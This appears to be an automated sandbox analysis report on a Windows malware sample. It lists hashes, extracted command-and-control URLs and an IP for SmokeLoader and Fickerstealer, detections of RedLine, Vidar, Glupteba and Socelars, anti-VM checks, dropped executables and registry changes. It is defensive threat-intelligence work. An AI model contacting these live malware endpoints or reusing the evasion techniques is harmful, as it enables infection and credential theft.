Analysis
max time kernel: 114s
max time network: 152s
platform: windows10_x64
resource: win10v20210408
submitted: 20-07-2021 03:22

Static task: static1
Behavioral task: behavioral1
  Sample: 88A990A868EADA802839185B6F05C541.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 88A990A868EADA802839185B6F05C541.exe
  Resource: win10v20210408

General
Target: 88A990A868EADA802839185B6F05C541.exe
Size: 3.2MB
MD5: 88a990a868eada802839185b6f05c541
SHA1: 499be12d4fe4f30e672601b1ccbfc4f014a8bca8
SHA256: 474a473bf46fdbfb5a9344937674c1455d764e74c2cd8892da7d59f68ffadd5c
SHA512: 7bd11e52a079da6584669707617a433a9f233a7300057d4751872ab202dc665b9c8429df7a641951ef04f51af74fe09e5ac6be49aa7fe2aedb235409e0243cad
Malware Config
Extracted: smokeloader (2020)
  http://conceitosseg.com/upload/
  http://integrasidata.com/upload/
  http://ozentekstil.com/upload/
  http://finbelportal.com/upload/
  http://telanganadigital.com/upload/
Extracted: fickerstealer
  37.0.8.225:80
Extracted: metasploit
  windows/single_exec
Signatures

Fickerstealer
Ficker is an infostealer written in Rust and ASM.

Glupteba Payload (2 IoCs)
resource | yara_rule
behavioral2/memory/6024-480-0x00000000015D0000-0x0000000001EF6000-memory.dmp | family_glupteba
behavioral2/memory/6024-481-0x0000000000400000-0x0000000000D41000-memory.dmp | family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4820 | 4716 | rUNdlL32.eXe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5216 | 3016 | rUNdlL32.eXe | 157
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4912 | 3016 | rUNdlL32.eXe | 157
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (7 IoCs)
resource | yara_rule
behavioral2/files/0x000100000001ac00-323.dat | family_redline
behavioral2/files/0x000100000001ac00-319.dat | family_redline
behavioral2/memory/4836-437-0x0000000000417E1E-mapping.dmp | family_redline
behavioral2/memory/2312-439-0x0000000000417E26-mapping.dmp | family_redline
behavioral2/memory/5272-453-0x0000000000417DEE-mapping.dmp | family_redline
behavioral2/memory/6028-473-0x0000000000417DEA-mapping.dmp | family_redline
behavioral2/memory/5352-614-0x0000000000417E22-mapping.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x00020000000197e8-141.dat | family_socelars
behavioral2/files/0x00020000000197e8-140.dat | family_socelars
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (1 IoCs)
resource | yara_rule
behavioral2/memory/5404-592-0x000000000046B76D-mapping.dmp | family_vidar

Downloads MZ/PE file

Executes dropped EXE (28 IoCs)
pid | Process
3916 | Files.exe
2112 | File.exe
4168 | Folder.exe
4212 | KRSetp.exe
4248 | Info.exe
4292 | jg3_3uag.exe
4316 | Install.exe
4396 | pub2.exe
4516 | Folder.exe
5480 | bz7NidxgK752OQuKGpXs5iwz.exe
5512 | WGbVcIBAsQcSiFMmqHFE8wq9.exe
5540 | ssFqA60ovSmfzaH0YHkP__Bp.exe
5588 | 7C0sF6DCguOrqWtIfI8Y5Fw2.exe
5612 | PqvGsfeLzoFewvfPJpfwL5el.exe
5648 | seBCf4ZlNLZ9PaeYpIEYTmZ6.exe
5660 | Qme2sFpaAjRiZgbn9sDjN91x.exe
6000 | efZJSzwJLtDVOkr6nI6JeUNG.exe
6020 | lmaJgmjUdnJRcF8me39B6cpp.exe
6024 | WqU8afrqJ_wEl7LC18l5PV1i.exe
6036 | v9rmvwLlLvA5U9ymdLMEUTJW.exe
6048 | RO3QNbYnukhvSgCvLm09jbuj.exe
6092 | wcvBkjEvJwuMtZyCqWUE6pBz.exe
6080 | sY07eraSUn_mxBuBdNDCn059.exe
6120 | JUaHo_m_PyvcqrF6QEipVMNQ.exe
6068 | TlTunaSTsvMnMn1ZPIfAsKr9.exe
6012 | w9dso34OfUUaZ8ZCNNnLh8kf.exe
5132 | EmTzd0lcH7R71dNGqBDqz17C.exe
3208 | 9eTvqwvLIlaadnIeHwiSKWLU.exe

resource | yara_rule
behavioral2/files/0x00020000000152e2-136.dat | vmprotect
behavioral2/files/0x00020000000152e2-135.dat | vmprotect
behavioral2/memory/4292-143-0x0000000000400000-0x00000000005DB000-memory.dmp | vmprotect
behavioral2/files/0x000100000001ac24-375.dat | vmprotect
behavioral2/files/0x000100000001ac24-374.dat | vmprotect
Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 9eTvqwvLIlaadnIeHwiSKWLU.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 9eTvqwvLIlaadnIeHwiSKWLU.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | sY07eraSUn_mxBuBdNDCn059.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | sY07eraSUn_mxBuBdNDCn059.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | 88A990A868EADA802839185B6F05C541.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation | Files.exe

Loads dropped DLL (2 IoCs)
pid | Process
4876 | rundll32.exe
4396 | pub2.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule
behavioral2/files/0x000100000001ac25-376.dat | themida
behavioral2/files/0x000100000001ac2e-385.dat | themida
behavioral2/files/0x000100000001ac25-377.dat | themida

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jg3_3uag.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | sY07eraSUn_mxBuBdNDCn059.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 9eTvqwvLIlaadnIeHwiSKWLU.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (6 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
191 | ipinfo.io
18 | ipinfo.io
19 | ipinfo.io
63 | ip-api.com
174 | api.ipify.org
189 | ipinfo.io
Drops file in System32 directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 91DF5CF3051F0205 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid | Process
6080 | sY07eraSUn_mxBuBdNDCn059.exe
3208 | 9eTvqwvLIlaadnIeHwiSKWLU.exe

Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 2036 set thread context of 4964 | 2036 | svchost.exe | 95

autoit_exe (2 IoCs)
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x000200000001ab51-122.dat | autoit_exe
behavioral2/files/0x000200000001ab51-123.dat | autoit_exe

Drops file in Program Files directory (7 IoCs)
description | ioc | Process
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe | Qme2sFpaAjRiZgbn9sDjN91x.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg | Qme2sFpaAjRiZgbn9sDjN91x.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg | Qme2sFpaAjRiZgbn9sDjN91x.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat | Qme2sFpaAjRiZgbn9sDjN91x.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe | Qme2sFpaAjRiZgbn9sDjN91x.exe
File opened for modification | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe | Qme2sFpaAjRiZgbn9sDjN91x.exe
File created | C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.ini | Qme2sFpaAjRiZgbn9sDjN91x.exe
Drops file in Windows directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (11 IoCs)
pid | pid_target | Process | procid_target
4776 | 6120 | WerFault.exe | 118
5656 | 6120 | WerFault.exe | 118
4192 | 6120 | WerFault.exe | 118
5480 | 6120 | WerFault.exe | 118
5576 | 6120 | WerFault.exe | 118
5408 | 6404 | WerFault.exe | 195
1928 | 6580 | WerFault.exe | 211
4324 | 6580 | WerFault.exe | 211
6956 | 6580 | WerFault.exe | 211
4700 | 6580 | WerFault.exe | 211
5288 | 6580 | WerFault.exe | 211

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe

Kills process with taskkill (2 IoCs)
pid | Process
6364 | taskkill.exe
4984 | taskkill.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS (13 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | svchost.exe
Modifies registry class (64 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC} | svchost.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | Process not Found
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 30c5ea1e5a7dd701 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{42B8813D-7B82-4C11-9D56-BD2579B207ED}" | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 1d24df8b702cd701 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 1d24df8b702cd701 | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | svchost.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 1d24df8b702cd701 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry | MicrosoftEdge.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}\1 = "5276" | svchost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | Process not Found
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "5344" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0a4526b3277dd701 | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 05398aee277dd701 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration | MicrosoftEdge.exe
